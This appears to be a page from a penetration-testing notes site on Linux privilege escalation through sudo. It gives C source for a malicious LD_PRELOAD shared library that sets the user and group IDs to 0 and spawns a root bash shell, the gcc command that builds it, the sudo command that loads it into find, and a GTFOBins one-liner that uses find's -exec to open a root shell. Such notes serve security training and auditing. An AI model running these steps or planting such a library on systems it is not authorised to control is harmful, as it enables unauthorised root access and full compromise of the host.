Sudo

Suppose for the below examples, the low-privileged user is allowed to run the find command with sudo privileges

$ sudo -l
Matching Defaults entries for [] on ...:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD
    ...

User [] may run the following commands on ...:
     ...
    (ALL) NOPASSWD: /usr/bin/find
    ...

LD_PRELOAD env variable

LD_PRELOAD is an environment variable in Linux that allows you to force the system to load specific shared libraries before any other libraries when running a program.

Example

To exploit the LD_PRELOAD environment variable, look for env_keep+=LD_PRELOAD from the results of the sudo -l command.

C code which simply spawns a root shell

shell.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

Using gcc to compile the C code into a shared object file:

gcc(1) - Linux manual page

$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles

-fPIC

If supported for the target machine, emit position-independent code, suitable for dynamic linking and avoiding any limit on the size of the global offset table.

-shared

Produce a shared object which can then be linked with other objects to form an executable

-nostartfiles

Do not use the standard system startup files when linking

Run the find command with LD_PRELOAD set as the previously created shared object file. This essentially executes the C code to spawn the root shell.

$ sudo LD_PRELOAD=.../shell.so find

Binaries with sudo privileges

Suppose the binary with sudo privilege is /usr/bin/find

$ sudo find . -exec /bin/sh \; -quit

Adapted from: https://gtfobins.github.io/gtfobins/find/#sudo

PreviousKernel exploit NextSUID

Last updated 5 months ago